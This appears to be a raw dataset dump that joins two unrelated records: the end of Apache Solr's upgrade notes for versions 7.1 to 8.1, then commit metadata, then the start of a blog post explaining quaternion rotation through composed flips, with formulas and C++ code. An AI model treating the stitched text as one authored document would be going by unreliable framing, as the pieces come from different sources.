Solr Upgrade Notes\n:page-children: major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. 
The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of implementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to your system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] file found in your Solr package. That file includes all the changes and updates that may effect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 8.x Releases\n\n=== Solr 8.1\n\n*Logging*\n\nSolr 8.1 changed the default log4j2 logging mode from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n\nIf even this slight risk is unacceptable, the log4j configuration file ..\/server\/resources\/log4j2.xml has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n== Upgrading to 7.x Releases\n\n=== Solr 7.6\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote76[7.6 Release Notes] for an overview of the main new features in Solr 7.6.\n\nWhen upgrading to Solr 7.6, users should be aware of the following major changes from v7.5:\n\n*Collections*\n\n* The JSON parameter to set cluster-wide default cluster properties with the <<collections-api.adoc#clusterprop,CLUSTERPROP>> command has changed.\n+\nThe old syntax nested the defaults into a property named `clusterDefaults`. The new syntax uses only `defaults`. The command to use is still `set-obj-property`.\n+\nAn example of the new syntax is:\n+\n[source,json]\n----\n{\n \"set-obj-property\": {\n \"defaults\" : {\n \"collection\": {\n \"numShards\": 2,\n \"nrtReplicas\": 1,\n \"tlogReplicas\": 1,\n \"pullReplicas\": 1\n }\n }\n }\n}\n----\n+\nThe old syntax will be supported until at least Solr 9, but users are advised to begin using the new syntax as soon as possible.\n\n* The parameter `min_rf` has been deprecated and no longer needs to be provided in order to see the achieved replication factor. 
This information will now always be returned to the client with the response.\n\n*Autoscaling*\n\n* An autoscaling policy is now used as the default strategy for selecting nodes on which new replicas or replicas of new collections are created.\n+\nA default policy is now in place for all users, which will sort nodes by the number of cores and available freedisk, which means by default a node with the fewest number of cores already on it and the highest available freedisk will be selected for new core creation.\n\n* The change described above has two additional impacts on the `maxShardsPerNode` parameter:\n\n. It removes the restriction against using `maxShardsPerNode` when an autoscaling policy is in place. This parameter can now always be set when creating a collection.\n. It removes the default setting of `maxShardsPerNode=1` when an autoscaling policy is in place. It will be set correctly (if required) regardless of whether an autoscaling policy is in place or not.\n+\nThe default value of `maxShardsPerNode` is still `1`. It can be set to `-1` if the old behavior of unlimited `maxSharedsPerNode` is desired.\n\n*DirectoryFactory*\n\n* Lucene has introduced the `ByteBuffersDirectoryFactory` as a replacement for the `RAMDirectoryFactory`, which will be removed in Solr 9.\n+\nWhile most users are still encouraged to use the `NRTCachingDirectoryFactory`, which allows Lucene to select the best directory factory to use, if you have explicitly configured Solr to use the `RAMDirectoryFactory`, you are encouraged to switch to the new implementation as soon as possible before Solr 9 is released.\n+\nFor more information about the new directory factory, see the Jira issue https:\/\/issues.apache.org\/jira\/browse\/LUCENE-8438[LUCENE-8438].\n+\nFor more information about the directory factory configuration in Solr, see the section <<datadir-and-directoryfactory-in-solrconfig.adoc#datadir-and-directoryfactory-in-solrconfig,DataDir and DirectoryFactory in SolrConfig>>.\n\n=== Solr 7.5\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote75[7.5 Release Notes] for an overview of the main new features in Solr 7.5.\n\nWhen upgrading to Solr 7.5, users should be aware of the following major changes from v7.4:\n\n*Schema Changes*\n\n* Since Solr 7.0, Solr's schema field-guessing has created `_str` fields for all `_txt` fields, and returned those by default with queries. As of 7.5, `_str` fields will no longer be returned by default. They will still be available and can be requested with the `fl` parameter on queries. See also the section on <<schemaless-mode.adoc#enable-field-class-guessing,field guessing>> for more information about how schema field guessing works.\n* The Standard Filter, which has been non-operational since at least Solr v4, has been removed.\n\n*Index Merge Policy*\n\n* When using the <<indexconfig-in-solrconfig.adoc#mergepolicyfactory,`TieredMergePolicy`>>, the default merge policy for Solr, `optimize` and `expungeDeletes` now respect the `maxMergedSegmentMB` configuration parameter, which defaults to `5000` (5GB).\n+\nIf it is absolutely necessary to control the number of segments present after optimize, specify `maxSegments` as a positive integer. 
Setting `maxSegments` higher than `1` are honored on a \"best effort\" basis.\n+\nThe `TieredMergePolicy` will also reclaim resources from segments that exceed `maxMergedSegmentMB` more aggressively than earlier.\n\n*UIMA Removed*\n\n* The UIMA contrib has been removed from Solr and is no longer available.\n\n*Logging*\n\n* Solr's logging configuration file is now located in `server\/resources\/log4j2.xml` by default.\n\n* A bug for Windows users has been corrected. When using Solr's examples (`bin\/solr start -e`) log files will now be put in the correct location (`example\/` instead of `server`). See also <<installing-solr.adoc#solr-examples,Solr Examples>> and <<solr-control-script-reference.adoc#solr-control-script-reference,Solr Control Script Reference>> for more information.\n\n\n=== Solr 7.4\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote74[7.4 Release Notes] for an overview of the main new features in Solr 7.4.\n\nWhen upgrading to Solr 7.4, users should be aware of the following major changes from v7.3:\n\n*Logging*\n\n* Solr now uses Log4j v2.11. The Log4j configuration is now in `log4j2.xml` rather than `log4j.properties` files. This is a server side change only and clients using SolrJ won't need any changes. Clients can still use any logging implementation which is compatible with SLF4J. We now let Log4j handle rotation of Solr logs at startup, and `bin\/solr` start scripts will no longer attempt this nor move existing console or garbage collection logs into `logs\/archived` either. See <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more details about Solr logging.\n\n* Configuring `slowQueryThresholdMillis` now logs slow requests to a separate file named `solr_slow_requests.log`. Previously they would get logged in the `solr.log` file.\n\n*Legacy Scaling (non-SolrCloud)*\n\n* In the <<index-replication.adoc#index-replication,master-slave model>> of scaling Solr, a slave no longer commits an empty index when a completely new index is detected on master during replication. To return to the previous behavior pass `false` to `skipCommitOnMasterVersionZero` in the slave section of replication handler configuration, or pass it to the `fetchindex` command.\n\nIf you are upgrading from a version earlier than Solr 7.3, please see previous version notes below.\n\n=== Solr 7.3\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote73[7.3 Release Notes] for an overview of the main new features in Solr 7.3.\n\nWhen upgrading to Solr 7.3, users should be aware of the following major changes from v7.2:\n\n*ConfigSets*\n\n* Collections created without specifying a configset name have used a copy of the `_default` configset since Solr 7.0. Before 7.3, the copied configset was named the same as the collection name, but from 7.3 onwards it will be named with a new \".AUTOCREATED\" suffix. This is to prevent overwriting custom configset names.\n\n*Learning to Rank*\n\n* The `rq` parameter used with Learning to Rank `rerank` query parsing no longer considers the `defType` parameter. See <<learning-to-rank.adoc#running-a-rerank-query,Running a Rerank Query>> for more information about this parameter.\n\n*Autoscaling & AutoAddReplicas*\n\n* The behaviour of the autoscaling system will now pause all triggers from execution between the start of actions and the end of a cool down period. The triggers will resume after the cool down period expires. 
Previously, the cool down period was a fixed period started after actions for a trigger event completed and during this time all triggers continued to run but any events were rejected and tried later.\n\n* The throttling mechanism used to limit the rate of autoscaling events processed has been removed. This deprecates the `actionThrottlePeriodSeconds` setting in the <<solrcloud-autoscaling-api.adoc#change-autoscaling-properties,`set-properties` Autoscaling API>> which is now non-operational. Use the `triggerCooldownPeriodSeconds` parameter instead to pause event processing.\n\n* The default value of `autoReplicaFailoverWaitAfterExpiration`, used with the AutoAddReplicas feature, has increased to 120 seconds from the previous default of 30 seconds. This affects how soon Solr adds new replicas to replace the replicas on nodes which have either crashed or shutdown.\n\n*Logging*\n\n* The default Solr log file size and number of backups have been raised to 32MB and 10 respectively. See the section <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more information about how to configure logging.\n\n*SolrCloud*\n\n* The old Leader-In-Recovery implementation (implemented in Solr 4.9) is now deprecated and replaced. Solr will support rolling upgrades from old 7.x versions of Solr to future 7.x releases until the last release of the 7.x major version.\n+\nThis means to upgrade to Solr 8 in the future, you will need to be on Solr 7.3 or higher.\n\n* Replicas which are not up-to-date are no longer allowed to become leader. Use the <<collections-api.adoc#forceleader,FORCELEADER command>> of the Collections API to allow these replicas become leader.\n\n*Spatial*\n\n* If you are using the spatial JTS library with Solr, you must upgrade to 1.15.0. This new version of JTS is now dual-licensed to include a BSD style license. See the section on <<spatial-search.adoc#spatial-search,Spatial Search>> for more information.\n\n*Highlighting*\n\n* The top-level `<highlighting>` element in `solrconfig.xml` is now officially deprecated in favour of the equivalent `<searchComponent>` syntax. This element has been out of use in default Solr installations for several releases already.\n\nIf you are upgrading from a version earlier than Solr 7.2, please see previous version notes below.\n\n=== Solr 7.2\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote72[7.2 Release Notes] for an overview of the main new features in Solr 7.2.\n\nWhen upgrading to Solr 7.2, users should be aware of the following major changes from v7.1:\n\n*Local Parameters*\n\n* Starting a query string with <<local-parameters-in-queries.adoc#local-parameters-in-queries,local parameters>> `{!myparser ...}` is used to switch from one query parser to another, and is intended for use by Solr system developers, not end users doing searches. To reduce negative side-effects of unintended hack-ability, Solr now limits the cases when local parameters will be parsed to only contexts in which the default parser is \"<<other-parsers.adoc#lucene-query-parser,lucene>>\" or \"<<other-parsers.adoc#function-query-parser,func>>\".\n+\nSo, if `defType=edismax` then `q={!myparser ...}` won't work. In that example, put the desired query parser into the `defType` parameter.\n+\nAnother example is if `deftype=edismax` then `hl.q={!myparser ...}` won't work for the same reason. In this example, either put the desired query parser into the `hl.qparser` parameter or set `hl.qparser=lucene`. 
Most users won't run into these cases but some will need to change.\n+\nIf you must have full backwards compatibility, use `luceneMatchVersion=7.1.0` or an earlier version.\n\n*eDisMax Parser*\n\n* The eDisMax parser by default no longer allows subqueries that specify a Solr parser using either local parameters, or the older `\\_query_` magic field trick.\n+\nFor example, `{!prefix f=myfield v=enterp}` or `\\_query_:\"{!prefix f=myfield v=enterp}\"` are not supported by default any longer. If you want to allow power-users to do this, set `uf=* _query_` or some other value that includes `\\_query_`.\n+\nIf you need full backwards compatibility for the time being, use `luceneMatchVersion=7.1.0` or something earlier.\n\nIf you are upgrading from a version earlier than Solr 7.1, please see previous version notes below.\n\n=== Solr 7.1\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote71[7.1 Release Notes] for an overview of the main new features of Solr 7.1.\n\nWhen upgrading to Solr 7.1, users should be aware of the following major changes from v7.0:\n\n*AutoAddReplicas*\n\n* The feature to automatically add replicas if a replica goes down, previously available only when storing indexes in HDFS, has been ported to the autoscaling framework. Due to this, `autoAddReplicas` is now available to all users even if their indexes are on local disks.\n+\nExisting users of this feature should not have to change anything. However, they should note these changes:\n\n** Behavior: Changing the `autoAddReplicas` property from disabled (`false`) to enabled (`true`) using <<collections-api.adoc#modifycollection,MODIFYCOLLECTION API>> no longer replaces down replicas for the collection immediately. Instead, replicas are only added if a node containing them went down while `autoAddReplicas` was enabled. The parameters `autoReplicaFailoverBadNodeExpiration` and `autoReplicaFailoverWorkLoopDelay` are no longer used.\n** Deprecations: Enabling\/disabling autoAddReplicas cluster-wide with the API will be deprecated; use suspend\/resume trigger APIs with `name=\".auto_add_replicas\"` instead.\n+\nMore information about the changes to this feature can be found in the section <<solrcloud-autoscaling-auto-add-replicas.adoc#solrcloud-autoscaling-auto-add-replicas,SolrCloud Automatically Adding Replicas>>.\n\n*Metrics Reporters*\n\n* Shard and cluster metric reporter configuration now require a `class` attribute.\n** If a reporter configures the `group=\"shard\"` attribute then please also configure the `class=\"org.apache.solr.metrics.reporters.solr.SolrShardReporter\"` attribute.\n** If a reporter configures the `group=\"cluster\"` attribute then please also configure the `class=\"org.apache.solr.metrics.reporters.solr.SolrClusterReporter\"` attribute.\n+\nSee the section <<metrics-reporting.adoc#shard-and-cluster-reporters,Shard and Cluster Reporters>> for more information.\n\n*Streaming Expressions*\n\n* All Stream Evaluators in `solrj.io.eval` have been refactored to have a simpler and more robust structure. This simplifies and condenses the code required to implement a new Evaluator and makes it much easier for evaluators to handle differing data types (primitives, objects, arrays, lists, and so forth).\n\n*ReplicationHandler*\n\n* In the ReplicationHandler, the `master.commitReserveDuration` sub-element is deprecated. 
Instead please configure a direct `commitReserveDuration` element for use in all modes (master, slave, cloud).\n\n*RunExecutableListener*\n\n* The `RunExecutableListener` was removed for security reasons. If you want to listen to events caused by updates, commits, or optimize, write your own listener as native Java class as part of a Solr plugin.\n\n*XML Query Parser*\n\n* In the XML query parser (`defType=xmlparser` or `{!xmlparser ... }`) the resolving of external entities is now disallowed by default.\n\nIf you are upgrading from a version earlier than Solr 7.0, please see <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from Any 6.x Release\n\nThe upgrade from Solr 6.x to Solr 7.0 introduces several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from pre-6.x Versions of Solr\n\nUsers upgrading from versions of Solr prior to 6.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32df9a5eb5132deda52f8f9c5821d06aab0f875f","subject":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","message":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_contents":"= An Easy Way to Understand Quaternion and Rotation: Part 1. Theory\nEric Zhang\n\n:stem: latexmath\n:figure-caption!:\n\n\nQuaternion is widely used in game engines to represent 3D rotation. As a game engineer you might be using quaternion explicitly or implicitly in your daily work, but do you really understand what is going on under the hood when you are calling \u201crotate a vector\u201d or \u201ccombine two rotations\u201d? Why rotating a vector stem:[v] by quaternion stem:[q] is calculated by a \u201csandwich\u201d multiplication: stem:[qvq^{-1}] ? Why rotating by quaternion stem:[q_1] then stem:[q_2] is in the reversed order: stem:[{q_2}{q_1}], and can you visualize the result rotation axis and angle?\n\nUnderstanding quaternions also leads to more efficient use of quaternion. For example, one common situation in game development is that we need an object to face its opposite direction. What we usually would do is to get the normal or forward vector, negate it, build a rotation out of it, and assign the rotation to the object. Later in this article we will see how much calculation we need to do in this process. However with the understanding of quaternion, we only need to do stem:[q=(q.y,-q.x,q.w,-q.z)], and I will show you why.\n\nIn this article, I will try to avoid touching the algebra structure of quaternion, or having to imagine a 4 dimensional hyper sphere. 
I will start with a special rotation operation: flip, and use that to visualize quaternions in a more accessible and geometrical way. This article will be split into 2 parts. In Part 1 we will talk about the idea of quaternion, understand and visualize how it rotates a vector and how to compose rotations. In Part 2 we will talk about how to make use of our understanding in Part 1, and how it is used in game engines compared with rotation matrices and Euler angles.\n\nI would assume you are comfortable with 3D math (vector dot product and cross product) and basic trigonometry.\n\n=== Quaternion Definition\n\nA quaternion is a 4-tuple denoted as stem:[q=(x,y,z,w)]. The length of a quaternion is defined as stem:[\\left|q\\right| =\\sqrt{x^{2}+y^{2}+z^{2}+w^{2}}], just as you would expect from a 4D vector. \n\nIn order to represent 3D rotation, we have a constraint on the quaternions we use. But before that I want to introduce Euler\u2019s rotation theorem:\n\n*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[\u03b8] along some axis stem:[\\vec{v}]._*\n\nWe can use a quaternion to describe this angle-axis rotation: stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v}.x,sin\u2061\\frac{\u03b8}{2}\\vec{v}.y,sin\u2061\\frac{\u03b8}{2}\\vec{v}.z,cos\u2061\\frac{\u03b8}{2})], or in a more compact form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. We call this form the vector form of a quaternion, and we will use this form throughout this article. You might be wondering why we are using stem:[\\frac{\u03b8}{2}] rather than stem:[\u03b8] directly. I will explain that in a later section.\n\nIt is easy to see the length of this quaternion stem:[\\left|q\\right|=\\sqrt{sin^{2}\\frac{\u03b8}{2}\\left|\\vec{v}\\right|^{2}+cos^{2}\\frac{\u03b8}{2}}=1]. (Remember the axis stem:[\\vec{v}] is a unit vector, so stem:[\\left|\\vec{v}\\right|=1].) We call it a unit quaternion if the length stem:[\\left|q\\right|=1]. So we can rewrite Euler\u2019s rotation theorem in quaternion terms:\n\n*_Any 3D rotation is equivalent to a unit quaternion stem:[q] with stem:[\\left|q\\right|=1]._*\n\n---\n.Side Note\n****\nThis claim actually has 2 sides. Let me go into a little more detail in math terms: \n(1). For any 3D rotation equivalent to a rotation of angle stem:[\u03b8] along axis stem:[\\vec{v}], there exists a unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] to describe this rotation. \n(2). For any unit quaternion stem:[q=(x,y,z,w)], it describes a rotation of angle stem:[\u03b8=2cos^{-1}w] along axis stem:[\\vec{v}=\\frac{(x,y,z)}{\\sqrt{1-w^{2}}}].\n\n****\n---\n\nFrom now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.\n\nTo make this concrete, here is a minimal C++ sketch of the vector form (the `Vec3` and `Quat` types and the function names are our own toy illustration for this article, not any particular engine\u2019s API):\n\n
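[source,cpp]\n----\n#include <cmath>\n\nstruct Vec3 { float x, y, z; };      \/\/ toy 3D vector\nstruct Quat { float x, y, z, w; };   \/\/ stored as (x, y, z, w)\n\n\/\/ Build the unit quaternion (sin(theta\/2)*v, cos(theta\/2)) for a\n\/\/ rotation of angle theta (radians) along the unit axis v.\nQuat fromAxisAngle(Vec3 v, float theta)\n{\n    const float s = std::sin(0.5f * theta);\n    return { s * v.x, s * v.y, s * v.z, std::cos(0.5f * theta) };\n}\n\n\/\/ Length of a quaternion; comes out as 1 for any unit axis v.\nfloat length(Quat q)\n{\n    return std::sqrt(q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w);\n}\n----\n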
\n=== Rotation and Flip\n\nNow let\u2019s forget quaternions for a minute, and focus on the nature of rotations. This part is the key to understanding quaternion calculation in an easier way.\n\n*_Any 3D rotation can be composed by 2 flips along some axes._*\n\nThe reason we want to break down a rotation into flips is that flips are much easier to reason about and calculate than a general 3D rotation. We will start from flips and build our way up to understanding rotation.\nHere is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\\circ}] along axis stem:[\\vec{Z}]. Now I can say this rotation is the same as 2 flips along axes stem:[\\vec{a}] and stem:[\\vec{b}], both of which are on the XY plane, and the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[+45^{\\circ}].\n\n.Figure 1 (a)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1.png[, 300,float=\"right\",align=\"center\"]\n.Figure 1 (b)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1_b.png[, 300,float=\"right\",align=\"center\"]\n\nWe demonstrate this through Figure 1. For any vector stem:[\\vec{v}], the result of this rotation is stem:[\\vec{v''}], which is the same as flipping stem:[\\vec{v}] along axis stem:[\\vec{a}] to get stem:[\\vec{v'}], and then flipping stem:[\\vec{v'}] along axis stem:[\\vec{b}] to get stem:[\\vec{v''}]. \n\nIt doesn\u2019t matter where stem:[\\vec{a}] and stem:[\\vec{b}] are on the XY plane, but the order must be kept. If we choose stem:[\\vec{b}] by rotating stem:[\\vec{a}] along axis stem:[\\vec{Z}] by stem:[+45^{\\circ}] with the positive direction we defined above, then we must flip along stem:[\\vec{a}] first then along stem:[\\vec{b}] to get our target rotation. The order and the sign of the angle are important: as you can easily see, flipping along stem:[\\vec{b}] first then along stem:[\\vec{a}] will give a different result.\n\nIt\u2019s not hard to generalize to a rotation of any angle stem:[\u03b8] along the stem:[\\vec{Z}] axis. And in this case, the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[\\frac{\u03b8}{2}].\n\nWhat if the axis is not the stem:[\\vec{Z}] axis but any unit vector stem:[\\vec{u}]? It turns out to be very straightforward. stem:[\\vec{a}] and stem:[\\vec{b}] are no longer on the XY plane but on a plane crossing the origin and perpendicular to stem:[\\vec{u}], as in Figure 2.\n\n.Figure 2\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig2.png[, 400,align=\"center\"]\n\nNow we can rewrite our flip composition rule in a more specific form:\n\n*_Any 3D rotation equivalent to a rotation of angle stem:[\u03b8] along axis stem:[\\vec{v}] can be represented as a sequence of 2 flips along axes stem:[\\vec{a}] and stem:[\\vec{b}], such that stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nThis representation means if we fully understand flips, which are easier to visualize, we can fully understand rotation and quaternions, since any quaternion can be broken down into flips.\n\n=== Quaternion and Flip\n\nNow let\u2019s recall the quaternion vector form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\\frac{\u03b8}{2}] here.\n\nThink about flips again. A flip along axis stem:[\\vec{a}] is also a stem:[180^{\\circ}] rotation along axis stem:[\\vec{a}]. So this flip can be represented in quaternion terms as\n\n[stem]\n++++\nq_a=(sin\u2061\\frac{180^{\\circ}}{2}\\vec{a},cos\u2061\\frac{180^{\\circ}}{2})=(\\vec{a},0)\n++++\n\nFrom now on we will use quaternions to represent flips. Actually any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].\n\n=== Flip Composition\n\nHere we need to introduce the multiplication of general quaternions. 
Let stem:[q_1=(\\vec{v_1},w_1)], stem:[q_2=(\\vec{v_2},w_2)], then\n\n[stem]\n++++\n{q_1}{q_2}=(\\vec{v_1},w_1)(\\vec{v_2},w_2)=(w_1\\vec{v_2} + w_2\\vec{v_1} + \\vec{v_1}\u00d7\\vec{v_2}, {w_1}{w_2}-\\vec{v_1}\u00b7\\vec{v_2})\n++++\n\nNote here stem:[q_1] and stem:[q_2] are not necessarily unit quaternions, so even though I\u2019m using the vector form, there\u2019s no need to put stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] as we did for unit quaternions. It\u2019s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interested in how this is derived, the quaternion https:\/\/en.wikipedia.org\/wiki\/Quaternion#Definition[Wiki page] has a very straightforward introduction.\n\nWe are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. Let stem:[q_a=(\\vec{a},0)], stem:[q_b=(\\vec{b},0)], then\n\n[stem]\n++++\n{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\n++++\n\nIt is naturally derived from the general form, and we will only be using this multiplication in Part 1.\n\nWith flip multiplication defined, we can rewrite our flip composition rule again:\n\n*_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that_*\n[stem]\n++++\nq=-{q_b}{q_a}\n++++\n*_where stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nYou might be thinking why it is not stem:[q= {q_a}{q_b}] instead. We will show where the order and the negative sign come from in the proof.\n\nstem:[\\vec{a}\u00b7\\vec{b}=cos<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|=cos\\frac{\u03b8}{2}]. Since stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and stem:[\\left|\\vec{v}\\right|=1], we have stem:[\\vec{a}\u00d7\\vec{b}=sin<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|\\vec{v}=sin\\frac{\u03b8}{2}\\vec{v}].\n\nIf you are not sure about the direction of the cross product, see Figure 2.\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=-(-\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-(\\vec{b}\u00d7\\vec{a},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-{q_b}{q_a}\n\\end{align*}\n++++\n\nHere you can also clearly see why we are using stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] in quaternions.\n\nOne thing I need to mention here is the negation of a quaternion. stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then\n\n[stem]\n++++\n\\begin{align*}\n{-q}&=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},-cos\u2061\\frac{\u03b8}{2})\\\\\n&=(-sin\u2061\\frac{2\u03c0-\u03b8}{2}\\vec{v},cos\u2061\\frac{2\u03c0-\u03b8}{2})\\\\\n&=(sin\u2061\\frac{-(2\u03c0-\u03b8)}{2}\\vec{v},cos\u2061\\frac{-(2\u03c0-\u03b8)}{2})\\\\\n\\end{align*}\n++++\n\nRecall that stem:[sin\u2061\u03b8=sin(\u03c0-\u03b8)] and stem:[-cos\u2061\u03b8=cos(\u03c0-\u03b8)], then stem:[-sin\u2061\u03b8=sin(-\u03b8)] and stem:[cos\u2061\u03b8=cos(-\u03b8)].\n\nIt shows that stem:[-q] is a rotation along axis stem:[\\vec{v}] of angle stem:[-(2\u03c0-\u03b8)], which is exactly the same rotation as stem:[q]. For example, if stem:[\u03b8=90^{\\circ}] then stem:[-(2\u03c0-\u03b8)=-270^{\\circ}]: rotating stem:[90^{\\circ}] along axis stem:[\\vec{v}] is the same as rotating stem:[270^{\\circ}] in the opposite direction along the same axis stem:[\\vec{v}].\n\nContinuing the toy C++ sketch from earlier, the two multiplication rules above look like this (an illustration under the same assumptions, not engine code):\n\n
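[source,cpp]\n----\n\/\/ Continuing the sketch above.\nVec3 cross(Vec3 a, Vec3 b)\n{\n    return { a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y - a.y * b.x };\n}\nfloat dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }\n\n\/\/ General product: (v1,w1)(v2,w2) = (w1*v2 + w2*v1 + v1 x v2, w1*w2 - v1.v2).\nQuat mul(Quat q1, Quat q2)\n{\n    const Vec3 v1{ q1.x, q1.y, q1.z }, v2{ q2.x, q2.y, q2.z };\n    const Vec3 c = cross(v1, v2);\n    return { q1.w * v2.x + q2.w * v1.x + c.x,\n             q1.w * v2.y + q2.w * v1.y + c.y,\n             q1.w * v2.z + q2.w * v1.z + c.z,\n             q1.w * q2.w - dot(v1, v2) };\n}\n\/\/ For two flips qa=(a,0), qb=(b,0) this reduces to (a x b, -a.b).\n----\n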
